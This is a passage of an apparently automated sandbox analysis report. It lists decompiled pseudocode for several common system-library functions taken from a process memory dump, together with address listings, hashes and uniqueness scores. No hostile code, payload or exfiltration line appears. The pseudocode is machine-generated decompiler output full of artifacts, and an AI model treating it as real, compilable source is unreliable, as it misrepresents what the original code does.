				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E046AD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0469F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04674620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04674620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0469F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04674620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0472740d
0x0472740d
0x04727412
0x04727413
0x04727416
0x04727418
0x0472741c
0x0472741f
0x04727422
0x04727422
0x04727428
0x0472742a
0x0472742a
0x04727451
0x04727432
0x0472744f
0x0472744f
0x00000000
0x04727434
0x04727438
0x04727443
0x04727517
0x04727517
0x0472751a
0x04727535
0x04727520
0x04727527
0x0472752c
0x04727531
0x04727533
0x00000000
0x04727533
0x00000000
0x04727531
0x0472754b
0x0472754f
0x0472755c
0x0472755c
0x0472755f
0x04727560
0x04727561
0x04727562
0x04727563
0x04727568
0x0472756a
0x0472756c
0x0472756d
0x0472756d
0x0472756f
0x04727572
0x04727574
0x04727577
0x0472757c
0x0472757f
0x00000000
0x04727551
0x04727551
0x04727551
0x04727553
0x04727553
0x04727449
0x04727449
0x0472744c
0x0472744c
0x00000000
0x0472744c
0x04727443
0x0472750e
0x04727514
0x04727514
0x04727455
0x04727469
0x0472746d
0x00000000
0x04727473
0x04727473
0x04727476
0x04727480
0x04727484
0x0472748e
0x04727493
0x04727493
0x04727496
0x04727499
0x047274a1
0x047274b1
0x047274b5
0x00000000
0x047274bb
0x047274c1
0x047274c1
0x047274c4
0x047274c5
0x047274c6
0x047274c7
0x047274c8
0x047274cd
0x00000000
0x047274d3
0x047274d3
0x047274d6
0x047274d8
0x047274db
0x047274dd
0x047274e0
0x047274e7
0x047274ee
0x047274ee
0x047274f4
0x047274f9
0x00000000
0x047274fb
0x047274fb
0x047274fd
0x04727500
0x04727503
0x04727505
0x04727505
0x047274f9
0x00000000
0x047274cd
0x047274b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: f935193a560a2c3accbc0cfb1a92b5699fbe61564da4859a6064cbf6eb2378f7
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 1A516A71600606EFDB19CF15C680A96FBB5FF45305F15C1AAE9089F212E771E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04684D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04684D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x474d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0469FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4747bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0469B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04674620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0465CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0469B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0469F380(_t67 + 0xc, 0x4635138, 0x10) == 0) {
								 *0x47460d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04684F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04684E70(0x47486b0, 0x4685690, 0, 0) != 0) {
					_t46 = E0465CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04684d3b
0x04684d4d
0x04684d53
0x04684d58
0x04684d65
0x04684d6c
0x04684d71
0x04684d77
0x04684d7f
0x04684d8c
0x04684d8e
0x04684dad
0x04684db0
0x04684db7
0x04684db8
0x04684db9
0x04684dba
0x04684dbb
0x04684dc1
0x04684dc8
0x04684dcc
0x04684dd5
0x04684dde
0x04684ddf
0x04684de0
0x04684de1
0x04684de6
0x04684de7
0x04684de9
0x04684df3
0x00000000
0x00000000
0x046c6c7c
0x046c6c8a
0x046c6c8a
0x046c6c9d
0x046c6ca7
0x046c6cac
0x046c6cb2
0x046c6cb9
0x00000000
0x046c6cbf
0x046c6cbf
0x00000000
0x046c6cbf
0x046c6cb9
0x04684dfb
0x046c6ccf
0x046c6cd3
0x04684e32
0x04684e39
0x046c6ce0
0x046c6cf2
0x046c6cf2
0x046c6ce0
0x04684e3f
0x04684e41
0x04684e51
0x04684e51
0x04684e03
0x04684e03
0x04684e09
0x04684e0f
0x04684e57
0x00000000
0x00000000
0x04684e1b
0x04684e30
0x04684e5b
0x04684e5b
0x00000000
0x04684e30
0x04684e11
0x04684e11
0x04684e16
0x00000000
0x04684e16
0x04684e01
0x00000000
0x04684e01
0x04684da5
0x046c6c6b
0x00000000
0x04684dab
0x04684dab
0x00000000
0x04684dab

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b73febc272d3e164a809c42b60cf4fe66f7a1b65fa688e912f012e056b612e
Instruction ID: 40a0c9ca019b5ad2e34ecf77abba5c91dd22d8749e9128b152552c3c455cbed4
Opcode Fuzzy Hash: d3b73febc272d3e164a809c42b60cf4fe66f7a1b65fa688e912f012e056b612e
Instruction Fuzzy Hash: EE419071A40318AFEB21EF14CD84BAAB7A9EB54714F00419EE94597380FBB4FD44CA95

Uniqueness

Uniqueness Score: -1.00%

Function 04668A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04668A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x474d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0469B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0466E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4631180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04681DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04693C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04668999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x04668a0a
0x04668a1c
0x04668a23
0x04668a2e
0x04668a30
0x04668a36
0x04668a3c
0x04668a3e
0x04668a4a
0x04668a52
0x04668a9c
0x04668aae
0x04668a58
0x04668a5e
0x04668a6a
0x04668a6f
0x04668a75
0x04668a7d
0x04668a85
0x04668a86
0x04668a89
0x04668a93
0x04668a99
0x04668a9b
0x00000000
0x04668aaf
0x04668abe
0x04668ac3
0x04668acb
0x04668ad7
0x04668ae0
0x04668af1
0x00000000
0x04668af1
0x04668acd
0x04668ad5
0x04668afb
0x04668afd
0x04668aff
0x04668b07
0x04668b22
0x04668b24
0x04668b2a
0x04668b2e
0x04668b3f
0x04668b78
0x04668b41
0x04668b52
0x04668b54
0x04668b5c
0x04668b74
0x04668b74
0x04668b5c
0x04668b3f
0x04668b5e
0x04668b61
0x04668b64
0x04668b64
0x04668b6c
0x04668b6c
0x04668b11
0x046b9cd5
0x046b9cd5
0x04668b17
0x04668b1a
0x04668b1a
0x00000000
0x04668ad5
0x04668a89

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f579e84c970eecc1073add03aa474d0d49ed0a7410ecf11bf4a4a79e503900
Instruction ID: bf6bba1c4b8892ad8873ba9884c1e58f9951cc1cd89b74bd27290ae172cd601d
Opcode Fuzzy Hash: 30f579e84c970eecc1073add03aa474d0d49ed0a7410ecf11bf4a4a79e503900
Instruction Fuzzy Hash: 4F415FB4A413289BDB24EF65C888AA9B3F8EF54300F1045EAD81A97341F770AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04693D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04693D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04667B60(0, _t61, 0x46311c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04667B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04674620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04693d4c
0x04693d50
0x04693d55
0x04693d5e
0x046ce79a
0x00000000
0x046ce79a
0x04693d68
0x046ce789
0x04693d9d
0x04693da3
0x04693daf
0x04693db5
0x04693dbc
0x04693dc4
0x04693dc9
0x04693dce
0x046ce7ae
0x046ce7ae
0x04693dde
0x04693de2
0x04693de7
0x04693e0d
0x04693e13
0x04693e16
0x04693e1e
0x04693e25
0x04693e28
0x00000000
0x00000000
0x04693e2a
0x04693e2f
0x04693e37
0x04693e37
0x00000000
0x04693e37
0x04693e31
0x00000000
0x04693e31
0x04693e20
0x04693e20
0x04693e35
0x00000000
0x04693de9
0x04693de9
0x04693de9
0x04693dee
0x04693dfd
0x04693dff
0x04693e02
0x04693e05
0x04693e05
0x00000000
0x04693df0
0x04693de7
0x046ce78f
0x046ce794
0x04693d79
0x04693d84
0x04693d89
0x04693d8e
0x00000000
0x046ce7a4
0x04693d96
0x04693d9a
0x00000000
0x04693d9a
0x00000000
0x046ce794
0x04693d6e
0x04693d73
0x00000000
0x046ce7b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe9d5631c6c91832a6cda522ec43a36b96c380de13b0544c3c67f27ba79dfbb3
Instruction ID: 075432384ec42bd99f096064ff8405b86a26796af8842f2af4e16f1688fa199b
Opcode Fuzzy Hash: fe9d5631c6c91832a6cda522ec43a36b96c380de13b0544c3c67f27ba79dfbb3
Instruction Fuzzy Hash: 24317E31A05615DBDB248F29C851A7ABBF9EF69700B09806EE846CB350F6B0EC81D790

Uniqueness

Uniqueness Score: -1.00%

Function 0468A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0468A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4730220);
				E046AD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4747b9c; // 0x0
				_t55 = L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E046AD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4747b10 =  *0x4747b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x474536c; // 0x288c1c8
					if( *_t51 != 0x4745368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4745368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x474536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0468A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0468a61c
0x0468a61e
0x0468a623
0x0468a628
0x0468a62b
0x0468a62d
0x0468a648
0x0468a64a
0x0468a64f
0x046c9b44
0x0468a6ec
0x0468a6f1
0x0468a6f1
0x0468a655
0x0468a657
0x0468a65a
0x0468a65d
0x0468a662
0x0468a663
0x0468a667
0x0468a668
0x0468a66d
0x0468a706
0x0468a706
0x046c9bda
0x046c9be6
0x046c9beb
0x00000000
0x046c9beb
0x0468a679
0x046c9b7a
0x00000000
0x046c9b7a
0x0468a683
0x0468a6f4
0x0468a6f7
0x0468a6f9
0x0468a6fd
0x0468a6a0
0x0468a6a0
0x0468a6ad
0x0468a6af
0x0468a6b4
0x046c9ba7
0x046c9bac
0x00000000
0x00000000
0x046c9bc6
0x046c9bce
0x046c9bd1
0x046c9bd3
0x046c9bd3
0x00000000
0x046c9bd1
0x0468a6bd
0x0468a6c3
0x0468a6c6
0x0468a6d2
0x0468a701
0x0468a704
0x00000000
0x0468a704
0x0468a6d4
0x0468a6d6
0x0468a6d9
0x0468a6db
0x0468a6e1
0x0468a6e6
0x0468a6e8
0x0468a6e8
0x0468a6ea
0x00000000
0x0468a6ea
0x0468a688
0x0468a692
0x0468a694
0x0468a699
0x00000000
0x00000000
0x0468a69d
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d44046d97bb0bdf24bb9db78315d225d7c472ebf29a9f3570e3c54f0a56c98
Instruction ID: e38b5ee2605d3ba12ae8c4d3fc52a89495119b085c44095dac961f78f8eaf81b
Opcode Fuzzy Hash: 85d44046d97bb0bdf24bb9db78315d225d7c472ebf29a9f3570e3c54f0a56c98
Instruction Fuzzy Hash: AC4158B9A00205EFDB14DF98C880BA9BBF2FB89704F15816EE904AB344E775B941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 046D7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E046D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x474d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E046D6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E046D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04677D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04699AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0469B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04674620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x046d7016
0x046d701e
0x046d702b
0x046d7033
0x046d7037
0x046d703c
0x046d703e
0x046d7041
0x046d7045
0x046d704a
0x046d7050
0x046d7055
0x046d705a
0x046d7062
0x046d7062
0x046d705a
0x046d7064
0x046d7064
0x046d7067
0x046d7071
0x046d7096
0x046d709b
0x046d70a2
0x046d70a6
0x046d70a7
0x046d70ad
0x046d70b3
0x046d70b6
0x046d70bb
0x046d70c3
0x046d70c3
0x046d70c6
0x046d70cd
0x046d70dd
0x046d70e0
0x046d70e2
0x046d70e2
0x046d70ee
0x046d7101
0x046d70f0
0x046d70f9
0x046d70f9
0x046d710a
0x046d710e
0x046d7112
0x046d7117
0x046d7118
0x046d7118
0x046d70bb
0x046d711d
0x046d7123
0x046d7131
0x046d7131
0x046d7136
0x046d713d
0x046d713e
0x046d713f
0x046d714a
0x046d714a
0x046d7084
0x046d7088
0x00000000
0x046d708e
0x046d708e
0x046d7092
0x00000000
0x046d7092

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77e4693407e7d99f891bb0e1d7adb82d5b0423d84154298c7a0317e538966f0
Instruction ID: d690e5c947ee3f65323f94fc5da79bcb659aee5bf19157f85658b8e08a17b6bc
Opcode Fuzzy Hash: b77e4693407e7d99f891bb0e1d7adb82d5b0423d84154298c7a0317e538966f0
